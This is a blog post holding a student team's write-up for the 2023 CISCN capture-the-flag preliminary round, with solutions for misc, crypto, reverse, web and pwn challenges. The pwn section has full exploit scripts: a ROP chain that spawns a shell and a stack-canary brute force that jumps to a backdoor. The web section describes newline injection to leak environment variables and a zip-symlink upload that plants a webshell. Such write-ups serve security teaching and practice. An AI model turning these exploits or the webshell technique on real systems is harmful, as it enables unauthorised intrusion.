CISCN_Dozer战队wp

经过2023年5月27日到5月28日两天时间的激烈鏖战,金陵科技学院集训队Dozer战队组成的两支队伍在2494支报名队伍里脱颖而出,均成功晋级全国大学生信息安全竞赛初赛,进入线下分区赛的角逐。
其中,以集训队现任队长贾云飞带领的Dozer2023这支队伍位居华东北赛区的第41名,成员分别为:朱霞,陈思维和吴彦霖

集训队宋绪炀带领的另一支队伍Dozer排名华东北赛区的第59名,成员分别是:季铖睿,张思展,倪成欣

复赛入围名单公布通知:http://www.ciscn.cn/upload/file/20230531/1685537364913663.pdf
复赛入围名单:http://www.ciscn.cn/upload/file/20230531/1685537235196805.pdf

以下是这次比赛的题解,希望大家继续努力,扬帆起航!

Misc

签到

代码:print(open('/flag').read())
得到flag

被加密的生产流量

追踪tcp.stream eq 0的TCP流

“MMYWMX3GNEYWOXZRGAYDA===”经过base32解密得到flag

pyshell

沙箱逃逸,长度限制加上白名单设置,用字符串拼接和白名单的字符

国粹

a和k是坐标,把题目图片这个表作为横轴和纵轴,坐标(a,k)涂黑即可

Crypto

基于国密SM2算法的密钥

公钥A_Public_Key

:::info
7624DAC71A7D3E142979AA800B65005E743F0C62FCB771AC81849316B8E21E16BC3B3EFF9F42C53D1B933C69E8DE20EFD477D8AAD4E595781F50250EA1D1DA21
:::

私钥A_Private_Key

:::info
1F43875CE7F4984973900E242C915CE324574F5A19AA6D348846F96753D9A831
:::

公钥B_Public_Key

:::info
042c5e9a5ee7fa9e83437b5e92c7d695027ecde1807982961adfdf4622275da34bbfcbde575621d81335e7916f656b36de5ba1b7bc003f1b8c5c8a62db625da3d8
:::

私钥B密文

:::info
c882c5209f00c20245e3c967634f81fc3ef398ec039355ff6b6ec2053f6bd6a7
:::

私钥b明文

:::info
C2 A1 C9 75 7A D1 97 E8 E9 6D 5C 0F 53 86 DA 0A BB 28 16 11 DA 58 71 24 B1 52 81 85 BB 38 46 EA
:::

c密文

:::info
41fb2d26589b420faee4c498f6b309ead00681bbb28dc4d98c49830489c061ef6917fc524126fbe3c9492c447f8a415414e8301fa9be6938b3edea175890dceaadec874ee0d3e321b4dfa0ef27b93586d8c6df76fbe4b7beae795f566d3fc1580904a375483c5149ddad2fda16c68106
:::

c明文

:::info
BD 37 75 32 F5 15 0D DB C6 10 9A E6 93 1D 6B 40
:::

d密文

:::info
4138c6bb7a4ebe754e0e0b313b7b4b9299832e458eb1c5b635200f1782cbcecad7444e6884af2b0733e1448d0205a43dada5e288ce8fc32324c4a48627f5a65204d8ecf80c999bc09a3b0d7b19b936fa082fbdcc8ed818ed05b6caa568ca44a24e2b2e7f7e9d6e3245bae24554758fd0
:::

d明文

:::info
5D 19 64 7C E1 AD 02 72 ED 06 96 B9 5D 50 DE 71
:::

可信度量

命令:find * | grep -ra "flag{"
得到flag

Sign_in_passwd

url编码:
base64:

reverse

babyre

下载,第一行官网

进去导入源码得到编译好的,分析

截屏左边是列表,右边是逻辑,有一个letter i of key和letter i-1 of key两个逻辑,结合列表第一个ascall码转字符串是"f"想到前后异或,写脚本成功跑出

ciphertext_list = [102,10,13,6,28,74,3,1,3,7,85,0,4,75,20,92,92,8,28,25,81,83,7,28,76,88,9,0,29,73,0,86,4,87,87,82,84,85,4,85,87,30]
for i in range(1, len(ciphertext_list)):
    ciphertext_list[i] = ciphertext_list[i - 1] ^ ciphertext_list[i]
for i in ciphertext_list:
    print(chr(i),end='')

web

dumpit


题目说 尝试用 ?db=&table_2_query= 或者 ?db=&table_2_dump=
先试试这个 ?db=ctf&table_2_query=flag1

看上去像从表中查信息
?db=ctf&table_2_dump=flag1 另一个

看上去是访问日志
查了很多 全是假flag

?db=ctf&table_2_dump=flag1 而这个看的日志结果都是一样 感觉可能对flag1过滤了 用%0a 结果sql语句日志全出了

看完发现并没有真的flag 认为flag可能不在数据库中 想到之前做过模板注入,flag在/etc/passwd tmp env中 所以猜测会不会在环境变量中
http://eci-2zeifb8rijs2733nu61o.cloudeci1.ichunqiu.com:8888/?db=ctf&table_2_dump=env
http://eci-2zeifb8rijs2733nu61o.cloudeci1.ichunqiu.com:8888/?db=ctf&table_2_query=env
并没有 尝试%0a 绕过
http://eci-2zeifb8rijs2733nu61o.cloudeci1.ichunqiu.com:8888/?db=ctf&table_2_dump= env

找到flag

unzip

ln -s /var/www/html test  

创建指向 /var/www/html 的软连接 并压缩

在test目录下写木马

再压缩 ln -s /var/www/html test

然后先上传test 再上传test1
首先应该那边有了/tmp/test,这是个指向/var/www/html的软连接,然后再上传test1.zip进行解压的时 候,实际上应该是把test.php解压到/tmp/test这个目录下
然后catflag  

pwn

烧烤摊儿

这个题因为是静态,可以直接找程序里面的gadgets

从pijiu里修改money,因为这是无符号整数型直接就改为负数即可(-999999)

进入vip函数修改own的值。
使用ROPgadget --binary p3 --ropchain获取payload。

exp

from pwn import*
from struct import pack
sh=remote('39.105.187.49',34749)
#sh=process('./p3')
elf=ELF('./p3')
sh.sendlineafter(b'> ',"1")
sh.sendlineafter(b'\n',"1")
sh.sendlineafter(b'\n',"-999999")
sh.sendlineafter(b'> ',"4")
sh.sendlineafter(b'> ',"5")
p = b''
p+=b'a'*0x28
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x0000000000458827) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040264f) # pop rdi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x00000000004a404b) # pop rdx ; pop rbx ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000402404) # syscall
sh.sendline(p)
sh.interactive()

y

funcanary

主函数如下,开了地址随机化和canary

进函数看,是一个read函数爆破点

而且有fork()函数可以多线程运行程序,考虑爆破canary
exp如下

 from pwn import*
p = remote("39.105.26.155", 32292)
p.recvuntil('welcome\n')
canary = '\x00'
for k in range(7):
	for i in range(256):
		payload = 'a'*0x68 + canary + chr(i)
		p.send(payload)
		data = p.recvuntil("welcome\n")
		print(data)
		if b"fun" in data:
			canary += chr(i)
			print("canary is:" + canary)
			break

back_door = 0x1231
payload = b'a' * 0x68 + p64(u64(canary)) + b'a' * 8 + p16(0x1231) 

p.send(payload)
p.interactive()
posted @ 2023-05-28 23:22  ㅤ浮虚千年  阅读(518)  评论(0编辑  收藏  举报